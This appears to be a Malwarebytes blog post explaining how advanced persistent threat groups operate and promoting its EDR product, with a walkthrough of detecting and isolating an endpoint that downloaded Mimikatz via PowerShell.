Cyber criminals come in all shapes and sizes.
On one end of the spectrum, there's the script kiddie or inexperienced ransomware gang looking to make a quick buck. On the other end are state-sponsored groups using far more sophisticated tacticsβoften with long-term, strategic goals in mind.
Advanced Persistent Threats (APT) groups fall into this latter category.
Well-funded and made up of an elite squadron of hackers, these groups target high-value entities like governments, large corporations, or critical infrastructure. They often deploy multi-stage, multi-vector approaches with a high degree of obfuscation and persistence.
But for every small-to-medium-sized business (SMB) out there asking themselves βWhy would an APT group care about me?β We have the answer.
SMBs can be stepping stones to bigger targetsβespecially if theyβre in a supply chain or serve larger entities. A whopping 93% of SMB execs even think nation-state hackers are using businesses like theirs as a backdoor into the countryβs digital defenses.
In this post, we'll break down how APT groups work, explain their tactics and evasive techniques, and how to detect APT attacks.
The aim of APT groups is not a quick hit, but a long-term presence within a system, allowing them to gather as much information as they can while remaining undetected.
APTs stand apart from typical cybercriminals in several key ways:
An example of APT reconnaissance (RedStinger) as observed by the Malwarebytes Threat Intelligence Team
So, how does an APT work its dark magic? Hereβs a quick rundown:
While not all these steps are required in every case, and the time and effort expended on each can vary widely, this provides a general framework for understanding how APTs operate.
Alright, now that we know the basics of how APTs operate, letβs dive into the specifics of their tools, techniques, and procedures (TTPs).
TTP (MITRE ATT&CK) | Description |
---|---|
Phishing (Spear-phishing Attachment, Spear-phishing Link) | APT groups frequently initiate targeted spear-phishing attacks, often combined with social engineering and exploitation of software vulnerabilities, to gain initial access to a target network. Execution through API (T1059.005) or User Execution (T1204) |
In a word, APT groups use methods like "living off the land" (utilizing built-in software tools to carry out their activities), fileless malware (malware that resides in memory rather than on disk), encryption (to hide their communication), and anti-forensic measures (to cover their tracks).
Attribution is always a bit thorny when it comes to different APT groups, but some groups are rather well-known and their origin has become clear. A naming convention that not everyone follows is: Chinese APT actors are commonly known as "Pandas," Russian APTs as "Bears," and Iranian APTs as "Kittens".
Some examples:
Countries typically have different groups that focus on different targets, but generally speaking, some of the most frequently hit sectors are governments, aerospace, and telecommunications.
According to the cyber threat group list compiled by MITRE ATT&CK, weβre aware of over 100 APT groups worldwide. The majority of these groups have ties to China, Russia, and Iran. In fact, China and Russia alone are reportedly connected to nearly 63% of all these known groups.
For the purposes of this article, I compiled data on 37 different APT groups listed by American cybersecurity firm Mandiant and broke them down by country. I also ran numbers of the most frequently mentioned target industries; as this data comes from a relatively small sample size, treat these as rough estimates.
Youβve got a few tricks up your sleeve when it comes to detect APTs on your network.
You can use things like Intrusion Detection and Prevention Systems, or IDS/IPS for short, which keep an eye on your network traffic. Regular check-ups on your logs and network can also give you clues.
Then thereβs following bread crumbs known as Indicators of Compromise (IoCs) and watching for any weird behavior from users or end devices. But hereβs the thing, these threats are getting smarter and trickier.
Thatβs where Endpoint Detection and Response (EDR) comes in. Letβs take a look at how EDR can help level up your defense game against these APTs.
Consider, for example, the fairly common case of an APT group using Mimikatz, an open source tool for Windows security and credential management, to extract credentials from memory and perform privilege escalation. MITRE lists at least 8 APT groups observed to use Mimikatz for this exact purpose.
Using Malwarebytes EDR, we can find suspicious activity like this and quickly isolate the endpoint with which itβs associated.
Clicking into a high-severity alert, weβll see that we have categorization of rules to help a maybe newer or less savvy security expert understand whatβs going on with this process.
What we see here is the actual categorization of behaviors that Malwarebytes witnessed in this process. Each of these little bubbles has been color coded to help you understand the severity of this issue.
At the bottom, we have a detailed process timeline as well. Clicking into any of these nodes, we get a lot of rich context information about what this process did.
As a security analyst or an IT admin, the first question you typically ask when an incident occurs is: What happened? Do we know if itβs malicious? What is the actual extent of the potential damages? And so on.
We can see the exact time that it ran and the file hashes, so if we needed to do further investigation, we have those available. And most importantly, we've highlighted below the command line actually used to execute this technique on our machine.
This is really suspicious looking code that could definitively be a sign of an APT on the network. This PowerShell command is downloading and executing Mimikatz from a remote server. Letβs remediate ASAP!
Closing this view out weβll find a βRespondβ option in the upper-right hand corner with a drop-down menu to βIsolate Endpointβ.
We have three layers of isolation that we can provide: network isolation, process isolation, and desktop isolation.
The network and process isolations are intended to give us the ability to quarantine that machine and prevent it from doing anything that is not authorized by Malwarebytes.
What this means is, we can still use our Malwarebytes console to trigger scans to perform other tasks and to review data, but the machine otherwise canβt communicate or run anything else.
Bam! This potential APT threat is blocked all in a matter of minutes.
Want to see Malwarebytes EDR in action? [Learn more here.](<Endpoint Detection & Response Free Trial>)
Managed Detection and Response (MDR) services provide an attractive option for organizations without the expertise to manage EDR solutions. MDR services offer access to experienced security analysts who can monitor and respond to threats 24/7, detect and respond to APT attacks quickly and effectively, and provide ongoing tuning and optimization of EDR solutions to ensure maximum protection.